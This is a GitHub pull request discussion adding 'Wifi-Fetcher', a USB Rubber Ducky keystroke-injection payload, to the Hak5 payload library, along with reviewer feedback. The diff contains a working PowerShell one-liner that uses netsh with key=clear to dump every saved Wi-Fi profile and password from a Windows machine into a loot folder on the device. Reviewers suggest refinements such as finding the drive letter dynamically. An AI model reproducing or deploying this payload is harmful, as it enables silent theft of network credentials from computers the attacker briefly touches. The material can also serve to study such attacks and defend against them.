Wifi-Fetcher Payload #425
Wifi-Fetcher Payload #425
Conversation
Adding a payload to the Hak5 liberary
|
After uploading the payload for approval i just now saw that the winner of the recent Payload-awards has a script that serves almost the same functionallity as mine, only that mine has 0 Dependencies for the target since i used integrated system components and the outputfile is stored locally, which doesnt even require an internet connection, you also wont need a dropbox Token, if you create the directory in your ducky, its basically Plug 'n Play. Just dont have too much fun ; ) |
Shortened Overall Runtime
obfuscation by making the cmd less readable
fixed error with Delays . Removed the obfuscation because it was affecting the executiontime too much. also made the script run in only 22 seconds, which means we cut around 15 seconds from the initial script
|
your disclaimer regarding the required directory needs to go into the payload.txt, otherwise no one will ever see it after this is merged. you should also use DEFINE for this so it is easily changeable |
Added DISCLAIMER and INSTRUCTIONS
used DEFINE in the Script for easy adaptabillity
Please dont publish it yet as i will have to Test it beforehand,i will make some Last changes in the next 24 hours, then it can BE published to the repo
|
It IS ready, you can go ahead and put it in the repo |
| REM credits:ChatGPT helped a little here and there while debugging | ||
| REM DEPENDENCIES: NONE | ||
| REM TOTAL_EXEC_TIME: 18.5 seconds (may vary based of taged specifications) | ||
| DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." |
There was a problem hiding this comment.
I would change this to be a REM Rather than a DEFINE
| REM TOTAL_EXEC_TIME: 18.5 seconds (may vary based of taged specifications) | ||
| DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." | ||
| REM | ||
| DEFINE INSTR "IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE" |
There was a problem hiding this comment.
I would change this to be a REM Rather than a DEFINE
| DELAY 220 | ||
| STRINGLN color FE | ||
| DELAY 50 | ||
| STRINGLN start /MIN powershell "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" & exit |
There was a problem hiding this comment.
A better approach for this is to use dynamic code that locates the Duckys drive location. You can use PowerShell in order to locate the drive name DUCKY which is the default drive name.
for example:
Get-Volume | Where-Object { $_.FileSystemLabel -eq 'DUCKY' } | Select-Object -ExpandProperty DriveLetter
This dynamically located the drive letter for the ducky. Keep in mind that not everyone will be using the default label of DUCKY it is recommended you add a DEFINE for the label : DEFINE #DUCKY_DRIVE_LABEL DUCKY this allows the user to easily configure the payload for their specific configuration.
DEFINE #DUCKY_DRIVE_LABEL DUCKY
STRINGLN Get-Volume | Where-Object { $_.FileSystemLabel -eq '#DUCKY_DRIVE_LABEL' } | Select-Object -ExpandProperty DriveLetter
| @@ -0,0 +1,28 @@ | |||
| REM NAME: Wifi-Fetcher | |||
There was a problem hiding this comment.
You have placed your payload in the wrong directory. Please ensure that your payloads are uploaded to the correct directory: payloads/library/exfiltration/Wifi-Fetcher/payload.txt
A Paylaod that will exfiltrate all the wifi information that has been saved on the computer and pull it to the D:\loot\PwnedWIFI\all_wifi_info.txt file in your usb rubber ducky, if the file is not in that directory it will create it.
IF YOU DONT HAVE THE DIRECTORY D:\loot\PwnedWIFI\ On THE DUCKY, THIS SCRIPT WILL NOT WORK, EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE